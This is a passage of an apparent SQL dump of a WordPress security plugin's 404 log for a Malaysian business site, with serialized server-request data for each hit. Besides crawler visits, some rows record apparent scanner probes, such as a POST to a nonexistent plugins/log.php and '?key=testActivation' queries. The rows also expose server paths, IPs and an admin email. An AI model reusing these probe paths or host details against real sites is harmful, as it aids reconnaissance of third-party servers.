deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/hp-designjet-printers/\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/hp-designjet-printers/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa6ogknklFpw1fCLzD@4dQAAAAE\";s:12:\"REDIRECT_URL\";s:23:\"/hp-designjet-printers/\";s:11:\"REMOTE_ADDR\";s:13:\"40.77.167.111\";s:11:\"REMOTE_PORT\";s:5:\"21026\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/hp-designjet-printers/\";s:10:\"SCRIPT_URL\";s:23:\"/hp-designjet-printers/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa6ogknklFpw1fCLzD@4dQAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571727490.7608\";s:12:\"REQUEST_TIME\";s:10:\"1571727490\";}}','notice','2019-10-22 06:58:13','2019-10-22 06:58:11',34195304,35997696,'https://bintara.com.my/hp-designjet-printers/',1,0,'40.77.167.111'),(28698,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:50:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:27:\"/wp-content/plugins/log.php\";s:14:\"CONTENT_LENGTH\";s:2:\"28\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:49:\"https://bintara.com.my/wp-content/plugins/log.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:27:\"/wp-content/plugins/log.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa68vEnklFpw1fCLzD-IKAAAAA0\";s:19:\"REDIRECT_SCRIPT_URI\";s:49:\"https://bintara.com.my/wp-content/plugins/log.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:27:\"/wp-content/plugins/log.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa68vEnklFpw1fCLzD-IKAAAAA0\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"193.106.30.99\";s:11:\"REMOTE_PORT\";s:5:\"44524\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:49:\"https://bintara.com.my/wp-content/plugins/log.php\";s:10:\"SCRIPT_URL\";s:27:\"/wp-content/plugins/log.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa68vEnklFpw1fCLzD-IKAAAAA0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571732668.6559\";s:12:\"REQUEST_TIME\";s:10:\"1571732668\";}}','notice','2019-10-22 08:24:32','2019-10-22 08:24:29',35565272,37368568,'https://bintara.com.my/wp-content/plugins/log.php',1,0,'193.106.30.99'),(28699,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/toughbook-t1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-t1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/toughbook-t1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa7BPknklFpw1fCLzD-LxQAAABg\";s:12:\"REDIRECT_URL\";s:14:\"/toughbook-t1/\";s:11:\"REMOTE_ADDR\";s:12:\"157.55.39.10\";s:11:\"REMOTE_PORT\";s:5:\"13521\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-t1/\";s:10:\"SCRIPT_URL\";s:14:\"/toughbook-t1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa7BPknklFpw1fCLzD-LxQAAABg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571733823.1195\";s:12:\"REQUEST_TIME\";s:10:\"1571733823\";}}','notice','2019-10-22 08:43:47','2019-10-22 08:43:43',34190856,35991056,'https://bintara.com.my/toughbook-t1/',1,0,'157.55.39.10'),(28700,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:77:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft PowerPoint 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"3\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"DDE943F3-7A9C-4195-A9BA-B88F71A712E3\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa7KHUnklFpw1fCLzD-TCQAAAAk\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.144.245\";s:11:\"REMOTE_PORT\";s:5:\"53725\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa7KHUnklFpw1fCLzD-TCQAAAAk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571736093.6195\";s:12:\"REQUEST_TIME\";s:10:\"1571736093\";}}','notice','2019-10-22 09:21:37','2019-10-22 09:21:34',35662824,37467952,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.245'),(28701,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:25:\"/demo/?key=testActivation\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/demo/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:6:\"/demo/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa7M3PKpfhdzjfAsCG1h1wAAARg\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/demo/\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/demo/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa7M3PKpfhdzjfAsCG1h1wAAARg\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"192.241.235.210\";s:11:\"REMOTE_PORT\";s:5:\"58403\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/demo/\";s:10:\"SCRIPT_URL\";s:6:\"/demo/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa7M3PKpfhdzjfAsCG1h1wAAARg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571736797.1489\";s:12:\"REQUEST_TIME\";s:10:\"1571736797\";}}','notice','2019-10-22 09:33:19','2019-10-22 09:33:17',34965616,36768568,'https://bintara.com.my/demo/?key=testActivation',1,0,'192.241.235.210'),(28702,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:41:\"/demo/?initiationactivity=initiationready\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/demo/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:6:\"/demo/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa7M4J-09PeaulOT6TYGRwAAAMQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/demo/\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/demo/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa7M4J-09PeaulOT6TYGRwAAAMQ\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"192.241.235.210\";s:11:\"REMOTE_PORT\";s:5:\"58516\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/demo/\";s:10:\"SCRIPT_URL\";s:6:\"/demo/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa7M4J-09PeaulOT6TYGRwAAAMQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571736800.506\";s:12:\"REQUEST_TIME\";s:10:\"1571736800\";}}','notice','2019-10-22 09:33:22','2019-10-22 09:33:21',34970904,36775856,'https://bintara.com.my/demo/?initiationactivity=initiationready',1,0,'192.241.235.210'),(28703,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:41:\"/2019/?initiationactivity=initiationready\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/2019/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:6:\"/2019/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa7YLPKpfhdzjfAsCG1lsQAAAQA\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/2019/\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/2019/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa7YLPKpfhdzjfAsCG1lsQAAAQA\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"37.187.72.67\";s:11:\"REMOTE_PORT\";s:5:\"42779\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/2019/\";s:10:\"SCRIPT_URL\";s:6:\"/2019/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa7YLPKpfhdzjfAsCG1lsQAAAQA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571739692.7553\";s:12:\"REQUEST_TIME\";s:10:\"1571739692\";}}','notice','2019-10-22 10:21:35','2019-10-22 10:21:33',34971000,36785648,'https://bintara.com.my/2019/?initiationactivity=initiationready',1,0,'37.187.72.67'),(28704,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:25:\"/2019/?key=testActivation\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/2019/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:6:\"/2019/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa7YLfKpfhdzjfAsCG1lsgAAAQI\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/2019/\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/2019/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa7YLfKpfhdzjfAsCG1lsgAAAQI\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"37.187.72.67\";s:11:\"REMOTE_PORT\";s:5:\"42820\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/2019/\";s:10:\"SCRIPT_URL\";s:6:\"/2019/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa7YLfKpfhdzjfAsCG1lsgAAAQI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571739693.2589\";s:12:\"REQUEST_TIME\";s:10:\"1571739693\";}}','notice','2019-10-22 10:21:35','2019-10-22 10:21:33',34969672,36776712,'https://bintara.com.my/2019/?key=testActivation',1,0,'37.187.72.67'),(28705,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"/blog/tag/logitech-vc/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:42:\"ru, uk;q=0.8, be;q=0.8, en;q=0.7, *;q=0.01\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"support@search.yandex.ru\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:193:\"Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B411 Safari/600.1.4 (compatible; YandexMobileBot/3.0; 